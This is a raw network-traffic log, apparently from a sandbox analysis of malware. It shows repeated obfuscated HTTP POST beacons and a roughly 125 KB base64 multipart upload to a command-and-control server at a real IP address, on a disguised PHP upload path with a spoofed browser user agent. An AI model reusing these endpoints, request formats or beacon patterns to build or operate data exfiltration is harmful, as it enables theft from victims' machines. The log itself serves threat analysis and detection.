Dec 16, 2024 13:13:09.013806105 CET	1092	OUT	Data Raw: 51 50 59 56 5f 5d 54 5c 58 59 51 57 59 5a 54 5e 59 5c 59 49 56 5f 5a 5d 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QPYV_]T\XYQWYZT^Y\YIV_Z]T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y"=8211Y751_&#!!3+(4/Z6<.?B$1,)%G!"Z*>
Dec 16, 2024 13:13:09.892644882 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:10.126789093 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:10.514136076 CET	361	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----cTKXzs3OycE23gGeDVq17cCnhY9di5UkGP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 125298 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:10.870264053 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 63 54 4b 58 7a 73 33 4f 79 63 45 32 33 67 47 65 44 56 71 31 37 63 43 6e 68 59 39 64 69 35 55 6b 47 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------cTKXzs3OycE23gGeDVq17cCnhY9di5UkGPContent-Disposition: form-data; name="0"Content-Type: text/plainTP\SZ_T^XYQWYRTXYZYIV]Z[T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T
Dec 16, 2024 13:13:10.991120100 CET	12360	OUT	Data Raw: 41 32 41 48 59 50 6c 78 74 55 70 53 38 33 41 52 52 46 76 38 6c 67 67 34 4c 51 30 6f 2b 4a 36 31 77 47 45 36 53 36 6f 6a 41 33 49 4c 2b 53 6a 7a 6d 6d 68 53 42 55 6c 58 4d 44 48 6f 74 6c 74 68 59 65 76 4b 34 2b 50 4d 70 4d 36 62 34 52 65 32 5a 55 Data Ascii: A2AHYPlxtUpS83ARRFv8lgg4LQ0o+J61wGE6S6ojA3IL+SjzmmhSBUlXMDHotlthYevK4+PMpM6b4Re2ZUUHTawXv4Mz2vbJRbl+aH2uKfUb0Sxh47lxzLz5PJIMqKWSDiELV80fmjG8qjyCSKA+9i4LhkudYV77eKW/edIGpDjLSv+ugkERlEWweDMq7UIsSGca8MXUTiCzAaD/HhaBpCjtF/o/5AfkMLzgtxxIAJJW+y+DgsG
Dec 16, 2024 13:13:10.991157055 CET	2472	OUT	Data Raw: 73 39 4c 77 36 61 70 76 47 75 59 77 64 63 45 66 4a 2f 5a 73 34 6a 63 4d 44 34 61 6a 74 4f 67 6b 44 72 74 6b 76 46 46 58 56 49 35 34 74 51 52 4b 59 52 67 56 77 55 62 42 48 52 5a 32 46 4a 53 6d 54 75 41 46 7a 64 74 43 72 4a 54 38 77 68 57 4b 5a 51 Data Ascii: s9Lw6apvGuYwdcEfJ/Zs4jcMD4ajtOgkDrtkvFFXVI54tQRKYRgVwUbBHRZ2FJSmTuAFzdtCrJT8whWKZQkt0ePrE+nhzQhUMlNJvcFKBh6KVw9nbASnBCxa2mP/D6reOq7p9/0eH6IgCmIMBSSkhNGDSTfSPbolFAYC0gLSEo4uRTo2SgGRbqQFqVFKSnczmvHbwNfn/f39oQ8WPH0+5rVzn3Nf5zp3w1TVltHblBaSoPxbrrl
Dec 16, 2024 13:13:10.991498947 CET	7416	OUT	Data Raw: 6c 35 30 36 4c 44 65 2f 66 45 34 54 67 42 76 65 61 72 76 30 67 32 46 66 78 4f 58 34 59 50 45 35 50 67 64 4f 38 50 35 79 58 5a 46 45 49 6e 4b 75 51 51 64 77 66 54 30 73 59 37 4b 33 78 6a 37 6b 7a 71 42 6b 79 58 31 44 52 52 56 35 41 55 69 6c 5a 66 Data Ascii: l506LDe/fE4TgBvearv0g2FfxOX4YPE5PgdO8P5yXZFEInKuQQdwfT0sY7K3xj7kzqBkyX1DRRV5AUilZfBeOMuP18jQc/ygNunQm2hmNg4py0hrDyPhk3q7oaDjvhSsDrslO8lTpldkXk8G8m98H6iR8HKVRBVpDK7CeTFwE2JNisqaEViJwSSW/L88INyOpwz+Y1yltmP/+8z9I7I+AdXBVQgsk5YgkvfAfu2IpeVhjvJYfn8
Dec 16, 2024 13:13:10.991518021 CET	2472	OUT	Data Raw: 51 68 7a 6d 7a 6b 30 6c 53 37 53 6a 67 59 6d 35 74 44 6b 77 55 6e 53 47 68 53 50 47 55 63 35 4d 74 59 33 5a 52 6f 65 38 42 5a 31 78 34 70 5a 37 4c 77 6b 47 42 44 34 46 67 65 47 4f 66 36 47 55 4f 75 51 54 47 68 32 51 78 6b 77 45 47 71 4f 6c 5a 32 Data Ascii: Qhzmzk0lS7SjgYm5tDkwUnSGhSPGUc5MtY3ZRoe8BZ1x4pZ7LwkGBD4FgeGOf6GUOuQTGh2QxkwEGqOlZ27BAJz29KAKh2qYRazI1QsDg/1DJbPhRlYXgGKVDeVnD6YinVWfYEkuHhgOOMwlprWRlGhlOB70NXAUBIbsdtgQMNGm0pzntbN8a4mTl+Gak5OOjNcjmI0r5PIUmvWPOOmXMzByXJEAAtLKQgq5pGXoPoT7oleEcA6
Dec 16, 2024 13:13:11.111403942 CET	12360	OUT	Data Raw: 4d 65 32 5a 33 4b 48 63 68 46 32 6b 69 76 76 66 43 38 72 70 64 48 2f 58 4e 78 5a 47 50 52 42 74 51 61 58 53 66 75 58 36 6f 4f 2f 62 63 6b 4c 75 6f 69 48 6a 54 62 52 4c 62 34 36 7a 56 76 33 58 65 37 68 63 47 68 4f 7a 50 73 62 56 34 2f 38 2f 48 57 Data Ascii: Me2Z3KHchF2kivvfC8rpdH/XNxZGPRBtQaXSfuX6oO/bckLuoiHjTbRLb46zVv3Xe7hcGhOzPsbV4/8/HWuUJp51GxCKBxJGDShfYRj2bZdNgKsFriy+iSW7HOh3GRWAfa3pKkEAhkWiyzdBKQ1ePL3kYpfULA44hxvbweEP6gpU8W5Q51tfQR4uDgW3KCa2InFOQSHswk5wOYaKCzV5ch8OwhI0ZdxO4RSO4ZGbx1GhZnEsDnv
Dec 16, 2024 13:13:11.157944918 CET	28428	OUT	Data Raw: 32 61 30 46 73 47 56 73 46 59 66 58 7a 31 51 55 33 4f 5a 36 69 68 46 67 36 33 4b 4f 33 55 6e 62 2f 64 53 31 37 76 62 37 6e 6c 68 47 73 56 35 64 31 32 48 66 39 6c 6b 55 4b 37 73 38 61 6c 79 31 54 39 45 2b 76 4f 46 52 6d 44 2b 4c 49 35 41 43 62 65 Data Ascii: 2a0FsGVsFYfXz1QU3OZ6ihFg63KO3Unb/dS17vb7nlhGsV5d12Hf9lkUK7s8aly1T9E+vOFRmD+LI5ACbe0rul75zsz9pqres/2oT3fuSkZNL72GSDXXbiQaVLF2VH27Ie5cmvtYJfCsbfEHWfkC+Sm1jWwN68+jCiLRT8Ly3BZ9TF1NsG3CIjnZArfwQDGn8dAcJegRVNwJ9ulz22DhtghPBoZ+h/z7KbJ5YfH/WUn/fCmlsgJ
Dec 16, 2024 13:13:11.277803898 CET	6180	OUT	Data Raw: 48 48 50 54 38 4b 2b 76 34 57 7a 55 6d 79 58 4d 6c 7a 4e 2f 2f 42 51 50 53 46 52 72 61 2b 42 70 49 48 4b 4f 55 58 4a 39 6e 4d 7a 33 64 39 4a 44 57 37 6b 63 67 52 49 6b 6e 51 52 72 72 65 6d 52 71 6b 55 6c 68 2f 2b 34 2f 53 71 6f 48 51 6a 50 4d 33 Data Ascii: HHPT8K+v4WzUmyXMlzN//BQPSFRra+BpIHKOUXJ9nMz3d9JDW7kcgRIknQRrremRqkUlh/+4/SqoHQjPM3Ps7Tz1rk3fdWCstZBidG9Q/Bz/B+NCVkRkCV9SR3HGF/S+aOQLdcN7kGFo/biWP3sQngA27s6SJPFM0UBy2w7zj0DfxMWSr5kvWUquE1Xf0t+QXy2ZVU29vDW4XvIAV3d5uSCrPab4CGSERHW2bnOyzXBJnmvIkK7
Dec 16, 2024 13:13:11.319250107 CET	1236	OUT	Data Raw: 6e 54 66 59 50 54 38 62 75 4e 6c 58 56 6e 33 33 74 50 34 6c 4e 65 51 31 50 56 53 77 73 2f 74 59 49 72 77 2b 67 75 56 75 74 4c 7a 67 46 7a 33 51 44 68 6f 57 77 6c 48 6c 54 35 50 55 58 56 78 55 7a 42 31 76 65 52 56 4f 36 7a 37 30 50 72 46 61 45 42 Data Ascii: nTfYPT8buNlXVn33tP4lNeQ1PVSws/tYIrw+guVutLzgFz3QDhoWwlHlT5PUXVxUzB1veRVO6z70PrFaEBN6QvI7ipNavilazPKUEGS6wk7YcQyYoJ1o3zE+vC9fgmXR/KHyWegK79qAOfwKhM0fFlr3wSSu9f4J6ndiRg7X2ZOqRJtn6is/ej7fsvNu+SL2RQydhF4ySC53d926NWTLVlCAT1j7Ou3ysLDDmvabY8R9vKWaeee
Dec 16, 2024 13:13:11.479342937 CET	40014	OUT	Data Raw: 65 36 79 47 30 45 78 75 6d 78 34 6d 64 31 47 54 5a 62 76 2f 62 4f 65 43 6b 43 54 67 6a 34 73 70 78 39 74 4b 34 47 52 39 68 50 69 55 34 38 51 44 6d 67 77 36 51 48 38 73 50 51 6b 70 59 42 41 4b 58 61 53 2f 51 4c 63 64 53 55 4b 37 70 46 39 63 75 42 Data Ascii: e6yG0Exumx4md1GTZbv/bOeCkCTgj4spx9tK4GR9hPiU48QDmgw6QH8sPQkpYBAKXaS/QLcdSUK7pF9cuBAVwLSrAZa4UQpPwE9EgMEpeKFoTI8WhU1r9EboM4JEfESijQarixAXnpzysEUo4oKCcnujJILCSUIM2fhs4Npj8cn1XMcDAkatbkejfgbPF0tCDghFRTVHIlc2CBgjq935LkepRcV5NVv7+KRoDK2SMlVCabbNOGz
Dec 16, 2024 13:13:11.749321938 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:12.388295889 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0
Dec 16, 2024 13:13:12.388653040 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1812 Expect: 100-continue
Dec 16, 2024 13:13:12.780047894 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:13.288697004 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 23 57 21 39 2e 5e 26 3d 37 56 27 2e 03 05 24 38 30 1a 3c 13 33 07 3e 10 15 19 3d 06 20 01 27 2f 0e 05 3e 00 21 55 3f 11 30 1c 29 0b 2a 58 02 12 25 03 3e 21 23 55 2d 3d 3a 11 2a 03 3d 41 23 59 30 01 25 2d 20 0b 32 03 3a 03 21 3a 2e 0e 3f 29 06 52 29 02 04 15 2a 03 24 01 29 04 21 50 08 11 25 1b 28 12 20 0e 3d 20 3f 13 21 23 30 5c 24 2a 27 57 27 55 30 52 31 2c 09 59 2a 1c 27 5f 29 10 2a 5d 2c 2a 39 01 21 21 35 19 3e 38 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98#W!9.^&=7V'.$80<3>= '/>!U?0)X%>!#U-=:=A#Y0%- 2:!:.?)R)$)!P%( = ?!#0\$'W'U0R1,Y'_)],*9!!5>8.Q#)Q4\Q0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:10.643898964 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:10.995351076 CET	1096	OUT	Data Raw: 54 52 59 57 5f 5e 51 5f 58 59 51 57 59 5e 54 5a 59 54 59 47 56 5b 5a 5e 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TRYW_^Q_XYQWY^TZYTYGV[Z^T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!>8-2_-Y 5_=0"^3<$#Y6"+77B1!<+<%G!"Z6
Dec 16, 2024 13:13:11.869812012 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:12.101906061 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:12.364845037 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:13:12.713844061 CET	1096	OUT	Data Raw: 51 55 59 55 5a 5f 51 58 58 59 51 57 59 52 54 5e 59 55 59 40 56 58 5a 5d 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QUYUZ_QXXYQWYRT^YUY@VXZ]T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!];629=[ ">$U6=9^'+'>+!+77E1!3)<%G!"Z
Dec 16, 2024 13:13:13.648677111 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:13.885051966 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:14.153175116 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:13:14.510759115 CET	1096	OUT	Data Raw: 54 51 59 55 5f 5d 54 5a 58 59 51 57 59 5c 54 50 59 5d 59 46 56 5b 5a 59 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TQYU_]TZXYQWY\TPY]YFV[ZYT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!)^>2:!_ 5>=%(#>X3'W)77[6:+42T,%G!"Z>
Dec 16, 2024 13:13:15.379296064 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:15.623809099 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:15.863403082 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:16.213968992 CET	1096	OUT	Data Raw: 54 53 59 51 5f 56 54 54 58 59 51 57 59 5b 54 5f 59 5c 59 40 56 5c 5a 5a 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TSYQ_VTTXYQWY[T_Y\Y@V\ZZT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!)(.^&:9^#"(&4W#-60,$4#/1+$/%1$>%G!"Z"
Dec 16, 2024 13:13:17.105680943 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:17.337654114 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:17.584578991 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:17.932596922 CET	1096	OUT	Data Raw: 54 54 59 52 5a 5a 51 59 58 59 51 57 59 5f 54 5b 59 59 59 40 56 5a 5a 5e 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TTYRZZQYXYQWY_T[YYY@VZZ^T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!^6^1& %=Y$V5%X07),#,=Q+''%!8S),%G!"Z*2

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:18.454818010 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1812 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:18.841512918 CET	1812	OUT	Data Raw: 54 50 5c 56 5a 5a 54 59 58 59 51 57 59 52 54 59 59 5b 59 40 56 5d 5a 59 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TP\VZZTYXYQWYRTYY[Y@V]ZYT_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!=2-_#5Y=54S"=)$8=$5:(B?A$1$U><%G!"Z*
Dec 16, 2024 13:13:19.658176899 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:19.892437935 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 1f 23 50 36 2a 03 01 32 13 01 55 25 3e 2a 11 27 28 3c 1d 3f 04 24 14 2a 3e 38 02 3e 3f 24 06 27 01 37 5f 2a 00 31 56 3f 3c 37 01 29 0b 2a 58 02 12 26 5b 3e 31 33 57 38 2d 39 0a 3d 3d 00 1d 37 06 3f 12 26 13 20 0a 25 04 0b 5d 34 3a 25 55 2b 07 34 53 3e 5a 3d 07 2a 13 30 02 3d 04 21 50 08 11 25 50 2b 05 23 1c 29 33 37 5f 20 0d 2b 04 33 07 3c 0e 30 23 23 0c 26 02 3f 12 29 1c 37 15 3e 00 03 00 39 00 25 03 36 08 35 17 29 12 2e 51 23 0a 29 51 05 34 5c 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98#P62U%>'(<?$>8>?$'7_1V?<7)X&[>13W8-9==7?& %]4:%U+4S>Z=0=!P%P+#)37_ +3<0##&?)7>9%65).Q#)Q4\Q0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:18.736691952 CET	315	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue Connection: Keep-Alive
Dec 16, 2024 13:13:19.088823080 CET	1096	OUT	Data Raw: 54 53 5c 54 5a 58 51 5e 58 59 51 57 59 59 54 59 59 55 59 40 56 5c 5a 5d 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: TS\TZXQ^XYQWYYTYYUY@V\Z]T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!\=^%7"%#>:$'/_6?%<48&!8U)<%G!"Z*
Dec 16, 2024 13:13:19.966664076 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:20.198189020 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 13:13:20.444402933 CET	291	OUT	POST /gameBigloadHttp/apidumpjavascript/5game/Process/VmtoServerLinuxuploads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.124.185.16 Content-Length: 1096 Expect: 100-continue
Dec 16, 2024 13:13:20.792125940 CET	1096	OUT	Data Raw: 51 50 59 50 5f 5c 54 59 58 59 51 57 59 5b 54 5b 59 55 59 42 56 5e 5a 5e 54 5f 44 58 54 5e 58 5b 5a 5e 54 5d 51 5b 53 5c 47 5a 56 53 51 53 55 58 51 5a 5c 5f 46 57 55 53 51 5c 55 57 57 5c 5a 45 58 5a 59 5c 5d 58 59 56 58 5b 5f 59 5d 58 5b 53 56 58 Data Ascii: QPYP_\TYXYQWY[T[YUYBV^Z^T_DXT^X[Z^T]Q[S\GZVSQSUXQZ\_FWUSQ\UWW\ZEXZY\]XYVX[_Y]X[SVXVST]T]W_Q\CY[^[^ZQS^YRQTX_XUB^\_YPYUSWXQ]RRWATQ^T_UX]^\\ZRR^TUYVPPPT_X_ZDTXUWQBTX[T][\ZYURTPZQ]^YPZ[_Y!+;1%=X7S">6>)%;'U)$ !T+7E22;><%G!"Z*"
Dec 16, 2024 13:13:21.677011013 CET	25	IN	HTTP/1.1 100 Continue
Dec 16, 2024 13:13:21.909949064 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 12:13:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 57 5a 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 40WZX0